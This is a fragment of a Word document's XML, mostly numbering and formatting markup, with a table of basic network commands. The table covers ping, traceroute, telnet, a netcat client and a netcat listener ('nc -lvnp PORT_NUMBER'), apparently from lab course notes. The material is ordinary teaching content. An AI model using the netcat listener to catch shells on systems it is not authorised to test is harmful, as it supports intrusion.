          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion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5"/>
        <w:gridCol w:w="4556"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="55967624" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="425FB5E7" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CD229B2" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="700803CD" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="083F3340" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B9DCE80" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ping -c 10 MACHINE_IP</w:t>
            </w:r>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> on Linux or macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="61137A84" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E86C0B0" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129B0B76" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ping -n 10 MACHINE_IP</w:t>
            </w:r>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> on MS Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="0F4C2674" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43501330" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>traceroute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FCEE3A" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>traceroute MACHINE_IP</w:t>
            </w:r>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> on Linux or macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="23C33DE4" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776BDB85" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>tracert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FD18409" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tracert MACHINE_IP</w:t>
            </w:r>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> on MS Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="648486AD" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="142A079B" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B728C7E" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>telnet MACHINE_IP PORT_NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="4C3F0BD7" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B2F90EF" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>netcat as client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AD804DA" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nc MACHINE_IP PORT_NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B49CA" w:rsidRPr="009B49CA" w14:paraId="4CC19773" w14:textId="77777777" w:rsidTr="009B49CA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29B61FA2" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>netcat as server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE84C3D" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B49CA">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nc -lvnp PORT_NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FCA330B" w14:textId="402570B2" w:rsidR="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77612D5C" w14:textId="66161450" w:rsidR="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CE4BBD" w14:textId="77777777" w:rsidR="009B49CA" w:rsidRPr="00F512ED" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009B49CA" w:rsidRPr="00F512ED" w:rsidSect="00F512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21D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07B28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31E47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A23C4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E59A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EAEF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9D7846"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6665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C4F7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1FCF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97335"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19D8C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D6C7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07964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0CD632DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D18D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E5336"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFE805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520410"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE803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9101F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EEEF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A4FAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA82B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156C0CB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84BA5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B32BBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE9493F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6AD2EA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="169C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943EFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDA48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18163773"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC824DD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ABC6412"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD085D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1B704397"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66124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9609CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D45C6A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620D16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E6ED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722B6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C489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2F4552"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="470E3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DA43D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D60D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766D08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39782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167780"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9452A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1414711"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EDA6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BE1458"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49E06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5A21A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C2C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8C5A94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77383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276A9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CE6E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8694E18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C3A7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38816D1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BF4D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8A137A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04103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AB09A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3710B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3C17769C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30049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539C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="913C2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7347ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A043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BC14E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="513CC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2DA7751"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BBEC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54B7F73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="414A0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A73525"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F86D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7A290E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DEE4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CE3985"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0AC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D643D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A9CF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4B0827DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36780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C1806FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF943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D440212"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1310A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776BF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B1E1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48C43F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9320C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6276208"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A1AB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4E33C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CF4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5C4D04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE1CB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723158B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57D85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9B253F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="444C9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B5A5256"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09A2F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B7266DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="064C0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CCD6E34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="274C0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0F33D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62025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FB721B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="721AA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41B1C04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DECCC9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82110DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBC6F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A047184"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31C00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C2F0C9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67F6E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CF54491"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EB8D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D511439"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D9A1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F9F00B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CD29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17F6A99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D285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2087421"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F294A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24B028B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BA6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D63D4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5952F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5266C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBDE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703D32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA3C6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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="75104A39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6AD61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51747D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D72BD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76474FF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E482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8F81420"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D900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58592E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15663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11"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="62"/>
  </w:num>
